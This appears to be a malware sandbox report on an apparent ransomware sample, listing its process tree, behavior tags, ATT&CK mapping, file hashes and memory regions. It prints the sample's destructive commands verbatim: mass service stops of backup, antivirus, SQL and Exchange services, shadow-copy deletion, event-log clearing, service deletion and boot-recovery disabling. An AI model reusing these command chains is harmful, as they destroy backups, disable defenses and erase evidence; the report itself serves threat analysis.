C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMUSBArbService5⤵
-
C:\Windows\SysWOW64\net.exenet stop VMAuthdService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMAuthdService5⤵
-
C:\Windows\SysWOW64\net.exenet stop wanxiao-monitor4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wanxiao-monitor5⤵
-
C:\Windows\SysWOW64\net.exenet stop WebAttendServer4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WebAttendServer5⤵
-
C:\Windows\SysWOW64\net.exenet stop mysqltransport4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysqltransport5⤵
-
C:\Windows\SysWOW64\net.exenet stop VMnetDHCP4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMnetDHCP5⤵
-
C:\Windows\SysWOW64\net.exenet stop Tomcat84⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Tomcat85⤵
-
C:\Windows\SysWOW64\net.exenet stop "VMware NAT Service"4⤵
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer4⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer5⤵
-
C:\Windows\SysWOW64\net.exenet stop QPCore4⤵
-
C:\Windows\SysWOW64\net.exenet stop CASLicenceServer4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASLicenceServer5⤵
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdateService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdateService5⤵
-
C:\Windows\SysWOW64\net.exenet stop CASWebServer4⤵
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"5⤵
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"5⤵
-
C:\Windows\SysWOW64\net.exenet stop "AliyunService"4⤵
-
C:\Windows\SysWOW64\net.exenet stop CASXMLService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASXMLService5⤵
-
C:\Windows\SysWOW64\net.exenet stop AGSService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AGSService5⤵
-
C:\Windows\SysWOW64\net.exenet stop RapService4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"3⤵
-
C:\Windows\SysWOW64\net.exenet stop HaoZipSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop "igfxCUIService2.0.0.0"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"5⤵
-
C:\Windows\SysWOW64\net.exenet stop Realtek11nSU4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Realtek11nSU5⤵
-
C:\Windows\SysWOW64\net.exenet stop xenlite4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xenlite5⤵
-
C:\Windows\SysWOW64\net.exenet stop XenSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop XenSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.24⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.25⤵
-
C:\Windows\SysWOW64\net.exenet stop DellDRLogSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DellDRLogSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop FirebirdGuardianDeafaultInstance4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance5⤵
-
C:\Windows\SysWOW64\net.exenet stop JWEM3DBAUTORun4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWEM3DBAUTORun5⤵
-
C:\Windows\SysWOW64\net.exenet stop JWRinfoClientService4⤵
-
C:\Windows\SysWOW64\net.exenet stop JWService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWService5⤵
-
C:\Windows\SysWOW64\net.exenet stop Service24⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Service25⤵
-
C:\Windows\SysWOW64\net.exenet stop RapidRecoveryAgent4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapidRecoveryAgent5⤵
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance4⤵
-
C:\Windows\SysWOW64\net.exenet stop AdobeARMservice4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AdobeARMservice5⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop "Synology Drive VSS Service x64"4⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeanBackupSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeanBackupSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService13004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService13005⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService13004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService13005⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService13004⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService13005⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdWebService13004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdWebService13005⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"3⤵
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService14⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService15⤵
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService24⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService25⤵
-
C:\Windows\SysWOW64\net.exenet stop "memcached Server"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "memcached Server"5⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.44⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.45⤵
-
C:\Windows\SysWOW64\net.exenet stop UFIDAWebService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFIDAWebService5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSComplianceAudit4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSComplianceAudit5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeCompliance4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeCompliance5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDagMgmt4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDagMgmt5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDelivery4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDelivery5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDiagnostics4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDiagnostics5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFastSearch4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFastSearch5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFrontEndTransport4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFrontEndTransport5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL20084⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL20085⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHMRecovery4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHMRecovery5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHM4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap44⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap45⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIMAP4BE4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIMAP4BE5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxAssistants4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxAssistants5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeNotificationsBroker4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeNotificationsBroker5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePop34⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePop35⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePOP3BE4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePOP3BE5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRepl4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRepl5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRPC4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRPC5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeServiceHost4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeServiceHost5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WEVTUTIL EL3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL EL4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AMSI/Debug"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AirSpaceChannel"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Application"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowFilterGraph"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowPluginControl"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Els_Hyphenation/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "EndpointMapper"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "FirstUXPerf-Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "ForwardedEvents"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "General Logging"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "HardwareEvents"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "IHM_DebugChannel"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"3⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp.exe2⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWRinfoClientService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASWebServer1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "AliyunService"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapService1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Indicator Removal on Host
1File Deletion
2Impair Defenses
1File Permissions Modification
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\7-Zip\Lang\FILE RECOVERY.txtFilesize
1KB
MD560bdfcf30bfca987709978d5ab14992a
SHA1aed3522cc0d6380927aade25a2c32a847da43e9a
SHA256e86627865f09510ca6b75530be9a272d5543f116ac883907850f62b8389a7727
SHA5123de54a57f3752e57118fb8c407dffba20234ef8a5b0918d97eb949feeee7c631a73feb4d4e5bad1755701a8f0770d5b0266228302a73fe8330b663bfb7fe6322
-
C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.batFilesize
53KB
MD5b57545cb36ef6a19fdde4b2208ebb225
SHA11d319740835ff12562e04cc74545a047bba63031
SHA256445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
SHA5123618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyorghvc.pru.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3140-134-0x0000000005D50000-0x00000000062F4000-memory.dmpFilesize
5.6MB
-
memory/3140-135-0x0000000005690000-0x0000000005722000-memory.dmpFilesize
584KB
-
memory/3140-136-0x0000000005940000-0x0000000005950000-memory.dmpFilesize
64KB
-
memory/3140-137-0x0000000005660000-0x000000000566A000-memory.dmpFilesize
40KB
-
memory/3140-138-0x0000000007270000-0x0000000007292000-memory.dmpFilesize
136KB
-
memory/3140-133-0x0000000000C10000-0x0000000000C9A000-memory.dmpFilesize
552KB
-
memory/3140-158-0x0000000005940000-0x0000000005950000-memory.dmpFilesize
64KB
-
memory/3720-193-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-195-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-13075-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-2779-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-1380-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-198-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-197-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-196-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-183-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-184-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-185-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-168-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-169-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-171-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-172-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-194-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-174-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-177-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-178-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-179-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-180-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-182-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-190-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-192-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-189-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-186-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/4160-147-0x00000000056D0000-0x0000000005736000-memory.dmpFilesize
408KB
-
memory/4160-141-0x0000000004FC0000-0x0000000005026000-memory.dmpFilesize
408KB
-
memory/4160-148-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-161-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-160-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-159-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-140-0x0000000005030000-0x0000000005658000-memory.dmpFilesize
6.2MB
-
memory/4160-157-0x00000000061C0000-0x00000000061DA000-memory.dmpFilesize
104KB
-
memory/4160-156-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-139-0x00000000023A0000-0x00000000023D6000-memory.dmpFilesize
216KB
-
memory/4160-155-0x0000000007330000-0x00000000079AA000-memory.dmpFilesize
6.5MB
-
memory/4160-154-0x0000000005CE0000-0x0000000005CFE000-memory.dmpFilesize
120KB
-
memory/4160-153-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB